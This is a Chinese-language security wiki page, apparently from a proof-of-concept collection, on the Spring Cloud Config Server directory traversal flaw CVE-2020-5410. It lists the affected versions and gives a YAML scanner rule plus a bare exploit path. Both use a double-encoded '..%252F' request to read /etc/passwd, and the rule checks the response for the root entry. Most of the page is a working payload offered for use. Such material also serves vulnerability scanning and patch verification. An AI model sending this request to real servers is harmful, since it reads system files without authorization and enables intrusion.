menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Spring chevron_right Spring Cloud Config Server目录遍历(CVE-2020-5410)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    Spring Cloud Config、2.2.3 之前的 2.2.x 版、2.1.9 之前的 2.1.x 版以及不受支持的旧版本允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件。恶意用户或攻击者可以使用特制的 URL 发送请求,从而导致目录遍历攻击。

    影响范围

    Spring Cloud Config
2.1.0 to 2.1.8
2.2.0 to 2.2.2

    POC

    name: poc-yaml-spring-cloud-cve-2020-5410
rules:
  - method: GET
    path: >-
      /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
  author: Soveless(https://github.com/Soveless)
  Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
  links:
    - https://xz.aliyun.com/t/7877

    EXP

    /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a